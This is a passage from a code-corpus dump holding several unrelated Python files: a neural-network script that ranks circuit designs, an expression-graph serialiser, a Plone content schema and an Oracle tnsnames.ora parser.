%.2f%%, valid_acc = %.2f%%\" %(avg_train_acc*100, avg_valid_acc*100))\n\ndef plot_cost1d(range, dataset, cost):\n cost_min, cost_max = range\n plt.figure(1)\n plt.hist(cost, 50)\n plt.title('distribution of cost function')\n plt.figure(2)\n plt.hist(dataset[:,0], 50)\n plt.title('distribution of res_idx')\n plt.figure(3)\n plt.hist(dataset[:,1], 50)\n plt.title('distribution of mul_idx')\n plt.show()\n\ndef find_dsns_with_cost(cost_range, data_set, cost_set):\n \"\"\"\n\n :param cost_range:\n :param data_set:\n :param cost_set:\n :return:\n\n >>> find_dsns_with_cost([0.6,0.7], dataset, cost)\n\n \"\"\"\n indices = []\n for i in range(len(cost_set)):\n if cost_set[i] < cost_range[1] and cost_set[i] > cost_range[0]:\n indices.append(i)\n return indices\n\ndef combine2(design_arr1, cost_arr1, design_arr2, cost_arr2):\n # this combine function is used when doing inference\n # what this does it combines the two design arrs and produce the corresponding inputs to nn.\n # but also makes sure in the pairs generated, there is always one design from design_arr1, and one other is from\n # design_arr2\n\n nn_dataset = []\n cost_arr = []\n category = []\n\n for i in range(len(design_arr1)):\n for j in range(len(design_arr2)):\n\n if random.random() < 0.5:\n nn_dataset.append(list(design_arr1[i,:])+list(design_arr2[j,:]))\n cost_arr.append([cost_arr1[i], cost_arr2[j]])\n label = 1 if (cost_arr1[i] > cost_arr2[j]) else 0\n else:\n nn_dataset.append(list(design_arr2[j,:])+list(design_arr1[i,:]))\n cost_arr.append([cost_arr2[j], cost_arr1[i]])\n label = 1 if (cost_arr2[j] > cost_arr1[i]) else 0\n\n category.append(label)\n nn_labels = np.zeros((len(category), num_classes))\n nn_labels[np.arange(len(category)), category] = 1\n return np.array(nn_dataset), np.array(nn_labels), np.array(cost_arr)\n\n\ndef test_model2(session, training_dataset, training_cost):\n\n n_samples = 1000\n\n # generate the designs\n if os.path.exists('genetic_nn/checkpoint/two_stage/test_data.pkl'):\n with open('genetic_nn/checkpoint/two_stage/test_data.pkl', 'rb') as f:\n read_data = pickle.load(f)\n new_designs, new_cost = read_data['dataset'], read_data['cost']\n else:\n new_designs, new_cost = generate_data_set(n_samples)\n write_data = dict(dataset=new_designs, cost=new_cost)\n with open('genetic_nn/checkpoint/two_stage/test_data.pkl', 'wb') as f:\n pickle.dump(write_data, f)\n\n # sort training data_set\n sorted_indices = sorted(range(len(training_cost)), key=lambda x: training_cost[x])\n sorted_training_designs = training_dataset[sorted_indices]\n sorted_training_cost = training_cost[sorted_indices]\n\n nn_inputs, nn_labels, design_costs = combine2(sorted_training_designs[k_top-1:k_top],\n sorted_training_cost[k_top-1:k_top],\n new_designs, new_cost)\n drop_out_prob = 1\n feed_dict = {tf_train_dataset: nn_inputs,\n tf_train_labels: nn_labels,\n keep_prob: drop_out_prob}\n predictions, = session.run([train_prediction], feed_dict=feed_dict)\n\n for i in range(ref_dsn_idx):\n print(\"[Debug_test] dataset: {} -> {}\".format(sorted_training_designs[i], sorted_training_cost[i]))\n print(\"[Debug_test] ref design in dataset {} cost {}\".format(sorted_training_designs[ref_dsn_idx-1],\n sorted_training_cost[ref_dsn_idx-1]))\n print(\"[Debug_test] design1, design2, costs, label, prediction, correctness\")\n\n good_design_miss_cnt = 0\n good_design_caught_cnt = 0\n bad_design_miss_cnt = 0\n bad_design_caught_cnt = 0\n for i in range(len(nn_inputs)):\n design1 = nn_inputs[i, :num_features_per_design]\n design2 = nn_inputs[i, num_features_per_design:]\n costs = design_costs[i, :]\n label = nn_labels[i, :]\n prediction = predictions[i, :]\n predicted_label = 0\n if np.argmax(prediction) == np.argmax(label):\n # this is a correct prediction (caught design)\n predicted_label = 1\n # cnt += 1\n if sorted_training_cost[k_top-1] < costs[0] or sorted_training_cost[k_top-1] < costs[1]:\n # bad_design_caught_cnt\n bad_design_caught_cnt += 1\n elif sorted_training_cost[k_top-1] > costs[0] or sorted_training_cost[k_top-1] > costs[1]:\n # good_design_caught_cnt\n good_design_caught_cnt += 1\n else:\n # this is a miss classification\n if sorted_training_cost[k_top-1] < costs[0] or sorted_training_cost[k_top-1] < costs[1]:\n # bad_design_miss_cnt\n bad_design_miss_cnt += 1\n elif sorted_training_cost[k_top-1] > costs[0] or sorted_training_cost[k_top-1] > costs[1]:\n # good_design_miss_cnt\n good_design_miss_cnt += 1\n\n print(\"[Debug_test] {} -> {} -> {} -> {} -> {} -> {} \".format(list(design1), list(design2), costs, label, prediction, predicted_label))\n\n\n print(\"[Debug_test] accuracy = {}/{} = {}\".format(good_design_caught_cnt+bad_design_caught_cnt,n_samples,\n 1.0*(good_design_caught_cnt+bad_design_caught_cnt)/n_samples))\n\n print(\"[Debug_test] good_design recall accuracy = {}/{} = {}\".format(good_design_caught_cnt,\n good_design_caught_cnt+good_design_miss_cnt,\n 1.0*good_design_caught_cnt/(good_design_caught_cnt+good_design_miss_cnt)))\n print(\"[Debug_test] bad_design recall accuracy = {}/{} = {}\".format(bad_design_caught_cnt,\n bad_design_caught_cnt+bad_design_miss_cnt,\n 1.0*bad_design_caught_cnt/(bad_design_caught_cnt+bad_design_miss_cnt)))\n\n print(\"[Debug_test] good_design precision accuracy = {}/{} = {}\".format(good_design_caught_cnt,\n good_design_caught_cnt+bad_design_miss_cnt,\n 1.0*good_design_caught_cnt/(good_design_caught_cnt+bad_design_miss_cnt)))\n print(\"[Debug_test] bad_design precision accuracy = {}/{} = {}\".format(bad_design_caught_cnt,\n bad_design_caught_cnt+good_design_miss_cnt,\n 1.0*bad_design_caught_cnt/(bad_design_caught_cnt+good_design_miss_cnt)))\n\n\ndef test_model(session, training_dataset, training_cost):\n\n select_indices = []\n\n # plot_cost1d([0,3], training_dataset, training_cost)\n\n n_samples = 1000\n\n # generate the designs\n new_designs, new_cost = generate_data_set(n_samples)\n # sort them according to cost function for simplicity\n sorted_indices = sorted(range(len(new_cost)), key=lambda x: new_cost[x])\n sorted_designs = new_designs[sorted_indices]\n sorted_cost = new_cost[sorted_indices]\n\n # In here we should select the ones we care about and combine them to build the test_set for nn.\n # cluster1 = find_dsns_with_cost([1.9,3], sorted_designs, sorted_cost)\n # select_indices += random.sample(cluster1, 10)\n # select_indices += cluster1[-10:]\n # cluster2 = find_dsns_with_cost([2, 5], sorted_designs, sorted_cost)\n # select_indices += random.sample(cluster2, 5)\n # shuffle them randomly so there is no privilege because of the way we obtained them\n # random.shuffle(select_indices)\n\n #\n selected_designs = sorted_designs[select_indices]\n selected_cost = sorted_cost[select_indices]\n\n nn_inputs, nn_labels, design_costs, _ = combine(selected_designs, selected_cost)\n\n drop_out_prob = 1\n feed_dict = {tf_train_dataset: nn_inputs,\n tf_train_labels: nn_labels,\n keep_prob: drop_out_prob}\n predictions, = session.run([train_prediction], feed_dict=feed_dict)\n\n print(\"[Debug_test] design1, design2, costs, label, prediction, correctness\")\n\n cnt = 0\n for i in range(len(nn_inputs)):\n design1 = nn_inputs[i, :2]\n design2 = nn_inputs[i, 2:]\n costs = design_costs[i, :]\n label = nn_labels[i, :]\n prediction = predictions[i, :]\n predicted_label = 0\n if np.argmax(prediction) == np.argmax(label):\n predicted_label = 1\n cnt += 1\n print(\"[Debug_test] {} -> {} -> {} -> {} -> {} -> {} \".format(design1, design2, costs, label, prediction, predicted_label))\n print(\"[Debug_test] accuracy = {}/{} = {}\".format(cnt, len(nn_inputs), 1.0*cnt/len(nn_inputs)))\n\ndef run_model(session, design_pool, cost_pool, m_samples, ref_dsn, max_iter=1000):\n print(30*\"-\")\n print(\"[info] running model ... \")\n cnt = 0\n\n better_dsns = []\n better_dsns_costs, better_dsns_bw, better_dsns_gain, better_dsns_ibias = [], [], [], []\n better_dsns_pred = []\n for i in range(ref_dsn_idx):\n print(\"[Debug_test] dataset: {} -> {}\".format(design_pool[i], cost_pool[i]))\n print(\"[debug] ref design {} with ref cost {}\".format(design_pool[ref_dsn_idx], cost_pool[ref_dsn_idx]))\n for _ in range(max_iter):\n cnt += 1\n\n new_designs, _ = generate_data_set(1, evaluate=False)\n new_design = list(new_designs[0])\n # print(\"[debug] new_design = {}\".format(new_design))\n if any((new_design == row).all() for row in design_pool):\n # if design is already in the design pool skip ...\n # print(\"[debug] design {} already exists\".format(new_design))\n continue\n\n if random.random() < 0.5:\n input_nn = np.array(new_design + list(design_pool[ref_dsn_idx]))\n ref_label = 0\n else:\n input_nn = np.array(list(design_pool[ref_dsn_idx]) + new_design)\n ref_label = 1\n\n drop_out_prob = 1\n feed_dict = {tf_train_dataset: input_nn[None, :], keep_prob: drop_out_prob}\n prediction = session.run(train_prediction, feed_dict=feed_dict).flatten()\n # print(\"[debug] design {} -> {} -> {} \".format(new_design, design_pool[0], prediction))\n\n if np.argmax(prediction) == ref_label:\n # depending on the random ordering determine if the new design sample is better than the reference design\n better_dsns.append(new_design)\n better_dsns_pred.append(prediction)\n if len(better_dsns) == m_samples:\n break\n else:\n pass\n # just a sanity check for not too complicated circuit problems: run simulation for anything to make sure\n # I'm not doing anything too stupid\n # result = evaluate_individual(new_design)\n # cost = result[0]\n # if cost < cost_pool[ref_dsn_idx]:\n # print(\"[debug] design {} with cost {} was better but missed with prediction {}\".format(new_design, cost,\n # prediction))\n\n print(\"[info] new designs tried: %d\" %cnt)\n print(\"[info] new candidates size: %d \" %len(better_dsns))\n # now if we have enough number of new potential designs we do simulation for each\n if len(better_dsns) > 0.1*m_samples:\n for i in range(len(better_dsns)):\n result = evaluate_individual(better_dsns[i], verbose=False)\n cost = result[0]\n better_dsns_costs.append(cost)\n\n return np.array(better_dsns), np.array(better_dsns_costs), np.array(better_dsns_pred)\n\ndef test_swaping(session, dataset, cost):\n\n sorted_indices = sorted(range(len(dataset)), key=lambda x: cost[x])\n sorted_design_pool = dataset[sorted_indices]\n sorted_cost_pool = cost[sorted_indices]\n\n design1 = sorted_design_pool[ref_dsn_idx]\n cost1 = sorted_cost_pool[ref_dsn_idx]\n # design1 =\n # cost1=812\n cnt = 0\n n_samples = 1000\n\n print(\"[Debug_swapping] ref design: {} -> {}\".format(list(design1), cost1))\n\n\n # generate the designs\n if os.path.exists('genetic_nn/checkpoint/two_stage/test_data.pkl'):\n with open('genetic_nn/checkpoint/two_stage/test_data.pkl', 'rb') as f:\n read_data = pickle.load(f)\n design2s, costs = read_data['dataset'], read_data['cost']\n else:\n design2s, costs = generate_data_set(n_samples)\n write_data = dict(dataset=design2s, cost=costs)\n with open('genetic_nn/checkpoint/two_stage/test_data.pkl', 'wb') as f:\n pickle.dump(write_data, f)\n\n for i in range(len(design2s)):\n design2 = design2s[i]\n cost2 = costs[i]\n nn_inputs = np.array([list(design1)+list(design2), list(design2)+list(design1)])\n\n drop_out_prob = 1\n feed_dict = {tf_train_dataset: nn_inputs,\n keep_prob: drop_out_prob}\n predictions, = session.run([train_prediction], feed_dict=feed_dict)\n\n if np.argmax(predictions[0]) != np.argmax(predictions[1]):\n cnt += 1\n else:\n print(\"[Debug_swapping] found inconsistency in design: {} -> {}\".format(list(design2), cost2))\n print(\"[Debug_swapping] [d1,d2] -> {}\".format(predictions[0]))\n print(\"[Debug_swapping] [d2,d1] -> {}\".format(predictions[1]))\n\n print(\"[Debug_swapping] cnt=%d\" %cnt)\n\ndef test_swaping_on_train_valid(session, dataset, cost):\n\n cnt=0\n\n sorted_indices = sorted(range(len(dataset)), key=lambda x: cost[x])\n sorted_design_pool = dataset[sorted_indices]\n sorted_cost_pool = cost[sorted_indices]\n\n nn_dataset, nn_labels, cost_arr, adjustment_weights = combine(dataset, cost)\n\n drop_out_prob = 1\n feed_dict = {tf_train_dataset :nn_dataset,\n tf_train_labels :nn_labels,\n keep_prob :drop_out_prob}\n\n predictions, = session.run([train_prediction], feed_dict=feed_dict)\n\n for i in range(len(nn_dataset)):\n design1 = nn_dataset[i, :num_features_per_design]\n design2 = nn_dataset[i, num_features_per_design:]\n costs = cost_arr[i, :]\n label = nn_labels[i, :]\n prediction = predictions[i, :]\n predicted_label = 0\n if np.argmax(prediction) == np.argmax(label):\n predicted_label = 1\n cnt += 1\n print(\"[Debug_test] {} -> {} -> {} -> {} -> {} -> {} \".format(design1, design2, costs, label, prediction, predicted_label))\n print(\"[Debug_test] accuracy = {}/{} = {}\".format(cnt, len(nn_dataset), 1.0*cnt/len(nn_dataset)))\n\n\ndef test_two_designs(session, design1, design2):\n # print(type(design1))\n # print(type(design2))\n\n cost1 = evaluate_individual(list(design1))[0]\n cost2 = evaluate_individual(list(design2))[0]\n\n nn_inputs = np.array([list(design1)+list(design2), list(design2)+list(design1)])\n\n drop_out_prob = 1\n feed_dict = {tf_train_dataset: nn_inputs,\n keep_prob: drop_out_prob}\n predictions, = session.run([train_prediction], feed_dict=feed_dict)\n\n print(\"[test_model] design1 {} | design2 {}\".format(list(design1), list(design2)))\n print(\"[test_model] cost1 {} | cost2 {}\".format(cost1, cost2))\n print(\"[test_model] (d1,d2): {} | (d2,d1): {}\".format(predictions[0], predictions[1]))\n\ndef main():\n data_set_list,cost_set_list = [], []\n\n import argparse\n parser = argparse.ArgumentParser()\n parser.add_argument('--load_model', action='store_true')\n parser.add_argument('--model_dir', type=str, default='genetic_nn/checkpoint/two_stage')\n args = parser.parse_args()\n\n\n with tf.Session(graph=graph) as session:\n\n writer = tf.summary.FileWriter(summary_dir)\n writer.add_graph(graph)\n all_vars = tf.global_variables()\n saver = tf.train.Saver(all_vars)\n if not args.load_model:\n if os.path.exists('genetic_nn/checkpoint/two_stage/init_data.pkl'):\n with open('genetic_nn/checkpoint/two_stage/init_data.pkl', 'rb') as f:\n read_data = pickle.load(f)\n dataset, cost = read_data['dataset'], read_data['cost']\n else:\n dataset, cost = generate_data_set(n=n_init_samples)\n write_data = dict(dataset=dataset, cost=cost)\n with open('genetic_nn/checkpoint/two_stage/init_data.pkl', 'wb') as f:\n pickle.dump(write_data, f)\n\n print(\"Initialized\")\n train(session, dataset, cost, writer, num_epochs=num_epochs, batch_size=batch_size)\n else:\n print(\"Loading model from {}\".format(args.model_dir))\n saver.restore(session, os.path.join(args.model_dir, 'checkpoint.ckpt'))\n with open(os.path.join(args.model_dir, 'data.pkl'), 'rb') as f:\n data = pickle.load(f)\n dataset = data['dataset']\n cost = data['cost']\n\n # change test model if you want to really see how the trained model works data\n # test_model(session, dataset, cost)\n # test_model2(session, dataset, cost)\n test_swaping(session, dataset, cost)\n # test_swaping_on_train_valid(session, dataset, cost)\n\n # sorted_indices = sorted(range(len(dataset)), key=lambda x: cost[x])\n # sorted_design_pool = dataset[sorted_indices]\n # test_two_designs(session, sorted_design_pool[ref_dsn_idx] , design2 = [45, 36, 47,77,35,9,49])\n\n\n\n # for i in range(max_n_retraining):\n # # run_model() requires sorted design pool we have so far:\n # sorted_indices = sorted(range(len(dataset)), key=lambda x: cost[x])\n # sorted_design_pool = dataset[sorted_indices]\n # sorted_cost_pool = cost[sorted_indices]\n # # store the sorted design pool to a log file for later plotting\n # data_set_list.append(sorted_design_pool)\n # cost_set_list.append(sorted_cost_pool)\n #\n # # get the reference design for comparison\n # ref_design = sorted_design_pool[ref_dsn_idx]\n # ref_cost = cost[sorted_indices[ref_dsn_idx]]\n # print(\"[info] retraining step: {}, best design: {} -> {} \".format(i, ref_design, ref_cost))\n # new_dataset, new_cost, new_predictions = run_model(session, sorted_design_pool, sorted_cost_pool,\n # n_new_samples,\n # ref_dsn_idx, max_iter=1000)\n # if len(new_dataset) <= 0.1*n_new_samples :\n # # there are new points found that are as good as the old solutions\n # break\n # for k in range(len(new_dataset)):\n # print(\"[debug] {} -> {} -> {}\".format(new_dataset[k], new_cost[k], new_predictions[k]))\n #\n # dataset = np.concatenate((dataset, new_dataset), axis=0)\n # cost = np.concatenate((cost, new_cost), axis=0)\n # train(session, dataset, cost, writer, num_epochs=num_epochs, batch_size=batch_size)\n # print(\"[finished] best_solution = {}\".format(dataset[sorted_indices[0]]))\n # print(\"[finished] cost = {}\".format(cost[sorted_indices[0]]))\n # print(\"[finished] performance {} \".format(evaluate_individual(dataset[sorted_indices[0]]), verbose=False))\n #\n # write_data = dict(\n # data_set_list=data_set_list,\n # cost_set_list=cost_set_list,\n # )\n # with open('genetic_nn/log_files/two_stage_logbook.pickle', 'wb') as f:\n # pickle.dump(write_data, f)\n\ndef plot_cost_hist():\n\n if os.path.exists('genetic_nn/checkpoint/two_stage/init_data.pkl'):\n with open('genetic_nn/checkpoint/two_stage/init_data.pkl', 'rb') as f:\n read_data = pickle.load(f)\n dataset, cost = read_data['dataset'], read_data['cost']\n else:\n dataset, cost = generate_data_set(n=10000)\n write_data = dict(dataset=dataset, cost=cost)\n with open('genetic_nn/checkpoint/two_stage/init_data.pkl', 'wb') as f:\n pickle.dump(write_data, f)\n\n\n sorted_indices = sorted(range(len(dataset)), key=lambda x: cost[x])\n sorted_design_pool = dataset[sorted_indices]\n sorted_cost_pool = cost[sorted_indices]\n print(sorted_design_pool[0], sorted_cost_pool[0])\n plt.figure(1)\n plt.hist(cost, bins=5000, range=[0,100000])\n plt.title('distribution of cost function')\n plt.show()\n\nif __name__ == '__main__':\n main()\n # plot_cost_hist()","sub_path":"genetic_nn/dsn_cmp_two_stage.py","file_name":"dsn_cmp_two_stage.py","file_ext":"py","file_size_in_byte":38938,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"604651452","text":"import sys\nimport uuid\n\nimport pandas\nimport pydot\n\nfrom .exceptions import MalformedExpr\nfrom .operations import OPERATIONS, OP_ALIAS\n\n\ndef _colour(dict_):\n 'Allows for the use of the British English spelling of colour.'\n americanise = lambda s: s.replace('colour', 'color')\n return {americanise(k): v for k, v in dict_.iteritems()}\n\n\ndef expression_from_dict(dict_):\n try:\n class_name = dict_['__type__']\n except KeyError:\n raise MalformedExpr('I need a `__type__` key to know '\n 'which class to instantiate.')\n expression_class = getattr(sys.modules[__name__], class_name)\n return expression_class.from_dict(dict_)\n\n\nclass ExprBase(object):\n serialisable_attrs = ()\n\n def to_dict(self):\n return {attr: getattr(self, attr) for attr in self.serialisable_attrs}\n\n @classmethod\n def from_dict(cls, json_dict):\n attrs = dict()\n for attr in cls.serialisable_attrs:\n try:\n attrs.update({attr: json_dict[attr]})\n except KeyError:\n exc = MalformedExpr\n cls_ = cls.__class__.__name__\n raise exc('Class {} requires argument {}'.format(cls_, attr))\n return cls(**attrs)\n\n def serialise(self, serialiser):\n return serialiser(self.to_dict())\n\n def resolve(self, *args, **kwargs):\n raise NotImplementedError(\"Should have implemented `resolve` method\")\n\n @property\n def node(self):\n return pydot.Node(self.node_name,\n style='filled',\n **_colour(self.node_opts))\n\n def graph(self, name=None, graph=None, parent=None):\n if not graph:\n graph = pydot.Dot(name, graph_type='digraph')\n graph.add_node(self.node)\n if parent:\n graph.add_edge(pydot.Edge(self.node, parent))\n return graph\n\n def node_name(self, *args, **kwargs):\n raise NotImplementedError(\"Should have implemented `node_name` property.\") # NOQA\n\n\nclass Expr(ExprBase):\n __type__ = 'Expr'\n serialisable_attrs = ('__type__', 'operation_name', 'arguments')\n node_opts = {\n 'fontcolour': '#FFFFFF', # White\n 'fontsize': '17.0',\n 'fontname': 'Helvetica',\n 'fixedsize': 'true',\n 'width': '0.4',\n 'height': '0.4',\n 'colour': '#FF4136' # Red\n }\n\n def __init__(self, operation_name, arguments, **kwargs):\n self.operation_name = operation_name\n self.operation = OPERATIONS.get(operation_name, False)\n if not self.operation:\n raise MalformedExpr(\n \"Unsupported operation {}\".format(operation_name))\n self.arguments = arguments\n\n @property\n def node_name(self):\n return OP_ALIAS.get(self.operation_name, self.operation_name)\n\n @classmethod\n def from_dict(cls, dict_):\n try:\n params = {'operation_name': dict_['operation_name']}\n deserialised_args = map(expression_from_dict, dict_['arguments'])\n params['arguments'] = deserialised_args\n return cls(**params)\n except KeyError:\n raise MalformedExpr('Expr object requires '\n '`operation_name` and '\n '`arguments` please pass them')\n\n def resolve(self):\n resolved_arguments = [arg.resolve() for arg in self.arguments]\n return self.operation(*resolved_arguments)\n\n def graph(self, name=None, graph=None, parent=None):\n \"\"\"\n Build a graph of this expression, return `pydot.Dot` object.\n Reference for colours is at http://clrs.cc/\n To render a PNG image of the graph returned, simply call the\n `.write_png` method with the filename you with to write to.\n\n Example:\n\n >>> two = NumExpr(2)\n >>> expression = Expr(operation='+', arguments=[two, two])\n >>> graph = expression.graph('Two and two')\n >>> graph.write_png('two-and-two.png')\n True\n \"\"\"\n if not graph:\n graph = pydot.Dot(label=name, graph_type='digraph')\n graph.add_node(self.node)\n if parent:\n graph.add_edge(pydot.Edge(self.node, parent))\n for arg in self.arguments:\n graph = arg.graph(name, graph, self.node)\n return graph\n\n def to_dict(self):\n args_as_dicts = map(lambda arg: arg.to_dict(), self.arguments)\n return {\n '__type__': self.__type__,\n 'operation_name': self.operation_name,\n 'arguments': args_as_dicts\n }\n\n\nclass NumExpr(ExprBase):\n __type__ = 'NumExpr'\n serialisable_attrs = ('__type__', 'number')\n node_opts = {'colour': '#7FDBFF'} # Aqua\n\n def __init__(self, number, **kwargs):\n try:\n self.number = float(number)\n except ValueError:\n messg = 'NumExpr must be instantiated with a `Number`.'\n raise MalformedExpr(messg)\n\n @property\n def node_name(self):\n n = self.number\n return repr(int(n) if int(n) == float(n) else float(n))\n\n def resolve(self):\n return self.number\n\n\nclass DataFrameExpr(ExprBase):\n __type__ = 'DataFrameExpr'\n serialisable_attrs = ('__type__', 'dataframe')\n node_opts = {'colour': '#FFDC00'} # Yellow\n\n def __init__(self, dataframe, name='auto', **kwargs):\n if not isinstance(dataframe, pandas.DataFrame):\n messg = 'DataFrameExpr must be instantiated with a `DataFrame`.' # NOQA\n raise MalformedExpr(messg)\n self.dataframe = dataframe\n self.name = name\n\n @property\n def node_name(self):\n if self.name is 'auto':\n return \"df@{0}\".format(hex(id(self.dataframe)))\n return repr(self.name)\n\n def to_dict(self):\n return {\n '__type__': self.__type__,\n 'dataframe': self.dataframe.to_dict(),\n 'name': self.name,\n }\n\n @classmethod\n def from_dict(cls, dict_):\n try:\n dict_.update({\n 'dataframe': pandas.DataFrame.from_dict(dict_['dataframe']),\n })\n return cls(**dict_)\n except KeyError:\n raise MalformedExpr('DataFrameExpr object '\n 'requires `dataframe` key, '\n 'please pass it.')\n\n def resolve(self):\n return self.dataframe\n\n__all__ = (\n 'expression_from_dict',\n 'Expr',\n 'NumExpr',\n 'DataFrameExpr'\n)\n","sub_path":"expr/expressions.py","file_name":"expressions.py","file_ext":"py","file_size_in_byte":6560,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"88474348","text":"from five import grok\nfrom plone.namedfile.interfaces import IImageScaleTraversable\nfrom plone.namedfile.field import NamedBlobImage\nfrom plone.app.textfield import RichText\n\nfrom plone.directives import form\n\nfrom sa.overview import _\n\n\nclass IOvContent(form.Schema, IImageScaleTraversable):\n \"\"\"\n Description of the Example Type\n \"\"\"\n preview = RichText(\n title=_(u\"Preview List Items\"),\n description=_(u\"Please enter the items you wish to display as a \"\n U\"preview in listings optionally formatted as a list.\"),\n required=False,\n )\n image = NamedBlobImage(\n title=_(u\"Image\"),\n required=True,\n )\n maintext = RichText(\n title=_(u\"Haupttext\"),\n required=False,\n )\n","sub_path":"src/sa.overview/sa/overview/content/ovcontent.py","file_name":"ovcontent.py","file_ext":"py","file_size_in_byte":762,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"75449260","text":"# -*- coding: utf-8 -*-\n'''\nCreated on 19 oct. 2012\n\n@author: jmmasson\n'''\n\n\nclass Node:\n ''' tns object '''\n def __init__(self):\n self.name = None\n self.nodes = []\n self.value = None\n\n def parse(self, data, left=0, indent=''):\n ''' parse '''\n right = data.find('=', left)\n self.name = data[left:right].upper()\n left = right + 1\n if data[left] == '(':\n while data[left] == '(':\n left += 1\n node = Node()\n self.nodes.append(node)\n left = node.parse(data, left, indent + '-')\n if left >= len(data):\n return left\n if data[left] == ')':\n return left + 1\n else:\n return left\n else:\n right = data.find(')', left)\n self.value = data[left:right]\n return right + 1\n\n def get_boolean(self):\n value = self.value.lower()\n return value == 'on' or value == 'yes' or value == 'true'\n\n\nclass Description:\n def __init__(self):\n self.address_list = []\n self.connect_data = None\n self.failover = None\n self.load_balance = None\n\n def decode(self, nodes):\n for node in nodes:\n if node.name == 'ADDRESS_LIST':\n self.decode_address_list(node.nodes)\n elif node.name == 'ADDRESS':\n self.decode_address(self.create_address_list(), node.nodes)\n elif node.name == 'CONNECT_DATA':\n self.decode_connect_data(node.nodes)\n elif node.name == 'LOAD_BALANCE':\n self.load_balance = node.get_boolean()\n elif node.name == 'FAILOVER':\n self.failover = node.get_boolean()\n\n def decode_address_list(self, nodes):\n address_list = self.create_address_list()\n for node in nodes:\n if node.name == 'ADDRESS':\n self.decode_address(address_list, node.nodes)\n elif node.name == 'LOAD_BALANCE' or node.name == 'FAILOVER':\n address_list[node.name.lower()] = node.get_boolean()\n\n def decode_address(self, address_list, nodes):\n address = {}\n if not 'addresses' in address_list:\n address_list['addresses'] = [address]\n else:\n address_list['addresses'].append(address)\n for node in nodes:\n if node.value:\n address[node.name.lower()] = node.value\n\n def create_address_list(self):\n address_list = {}\n self.address_list.append(address_list)\n return address_list\n\n def decode_connect_data(self, nodes):\n self.connect_data = {}\n for node in nodes:\n if node.value:\n self.connect_data[node.name.lower()] = node.value\n\n def __str__(self):\n lines = ['(DESCRIPTION =']\n if self.load_balance != None:\n lines.append(' (LOAD_BALANCE = %s)' % str(self.load_balance).lower())\n if self.failover != None:\n lines.append(' (FAILOVER = %s)' % str(self.failover).lower())\n\n if len(self.address_list) == 1 \\\n and not 'load_balance' in self.address_list[0] \\\n and not 'failover' in self.address_list[0] \\\n and len(self.address_list[0]['addresses']) == 1:\n indent = ''\n else:\n indent = ' '\n\n for address_list in self.address_list:\n if indent:\n lines.append(' (ADDRESS_LIST =')\n if 'load_balance' in address_list:\n lines.append('%s (LOAD_BALANCE = %s)' % (indent, str(address_list['load_balance']).lower()))\n if 'failover' in address_list:\n lines.append('%s (FAILOVER = %s)' % (indent, str(address_list['failover']).lower()))\n for address in address_list['addresses']:\n lines.append('%s (ADDRESS = (PROTOCOL = %s)(HOST = %s)(PORT = %s))' % (indent,\n address['protocol'],\n address['host'],\n address['port']))\n if indent:\n lines.append(' )')\n\n fields = []\n for key, value in self.connect_data.iteritems():\n if value:\n fields.append('(%s = %s)' % (key.upper(), value))\n lines.append(' (CONNECT_DATA = %s)' % ''.join(fields))\n\n lines.append(')')\n return '\\n'.join(lines)\n\n\nclass Tns(Node):\n def __init__(self):\n Node.__init__(self)\n self.description_list = []\n self.load_balance = None\n self.failover = None\n\n def parse(self, data, left):\n result = Node.parse(self, data, left)\n for node in self.nodes:\n if node.name == 'DESCRIPTION_LIST':\n self.decode_description_list(node.nodes)\n elif node.name == 'DESCRIPTION':\n self.decode_description(self.create_description_list(),\n node.nodes)\n return result\n\n def data(self):\n data = {}\n if self.load_balance != None:\n data['load_balance'] = self.load_balance\n if self.failover != None:\n data['failover'] = self.failover\n data['descriptions'] = []\n for description_list in self.description_list:\n descriptions = []\n for description in description_list['descriptions']:\n data_list = {'address_list': description.address_list,\n 'connect_data': description.connect_data}\n if description.failover != None:\n data_list['failover'] = description.failover\n if description.load_balance != None:\n data_list['load_balance'] = description.load_balance\n descriptions.append(data_list)\n data_list = {'descriptions': descriptions}\n if 'failover' in description_list:\n data_list['failover'] = description_list['failover']\n if 'load_balance' in description_list:\n data_list['load_balance'] = description_list['load_balance']\n data['descriptions'].append(data_list)\n return data\n\n def create_description_list(self):\n description_list = {'descriptions': []}\n self.description_list.append(description_list)\n return description_list\n\n def decode_description_list(self, nodes):\n description_list = self.create_description_list()\n for node in nodes:\n if node.name == 'DESCRIPTION':\n self.decode_description(description_list, node.nodes)\n elif node.value:\n description_list[node.name.lower()] = node.get_boolean()\n\n def decode_description(self, description_list, nodes):\n description = Description()\n description_list['descriptions'].append(description)\n description.decode(nodes)\n\n def __str__(self):\n lines = ['%s =' % self.name]\n if len(self.description_list) == 1 \\\n and not 'load_balance' in self.description_list[0] \\\n and not 'failover' in self.description_list[0]:\n indent = ''\n else:\n indent = ' '\n\n for description_list in self.description_list:\n if indent:\n lines.append('(DESCRIPTION_LIST =')\n if 'load_balance' in description_list:\n lines.append(' (LOAD_BALANCE = %s)' % str(description_list['load_balance']).lower())\n if 'failover' in description_list:\n lines.append(' (FAILOVER = %s)' % str(description_list['failover']).lower())\n for description in description_list['descriptions']:\n if indent:\n for line in str(description).split('\\n'):\n lines.append(' %s' % line)\n else:\n lines.append(str(description))\n if indent:\n lines.append(')')\n lines.append('')\n return '\\n'.join(lines)\n\n\nclass TnsNames:\n ''' tnsnames '''\n def __init__(self):\n self.tns = {}\n self.data = {}\n\n def load(self, filename):\n lines = []\n for line in open(filename, 'r'):\n line = line.strip()\n if line.startswith('#'):\n continue\n lines.append(line.replace(' ', ''))\n self.parse(''.join(lines))\n\n def loads(self, string):\n lines = []\n for line in string.split('\\n'):\n line = line.strip()\n if line.startswith('#'):\n continue\n lines.append(line.replace(' ', ''))\n self.parse(''.join(lines))\n\n def parse(self, data):\n left = 0\n while left < len(data):\n tns = Tns()\n left = tns.parse(data, left)\n self.tns[tns.name] = tns\n self.data[tns.name] = tns.data()\n\n def __str__(self):\n lines = []\n for tns in self.tns.itervalues():\n lines.append(str(tns))\n return '\\n'.join(lines)\n","sub_path":"scripts/arch_work_scripts/python/tnsnames.py","file_name":"tnsnames.py","file_ext":"py","file_size_in_byte":9283,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"46885713","text":"\"\"\"Utilities\"\"\"\n\nfrom asyncio import StreamWriter\nimport 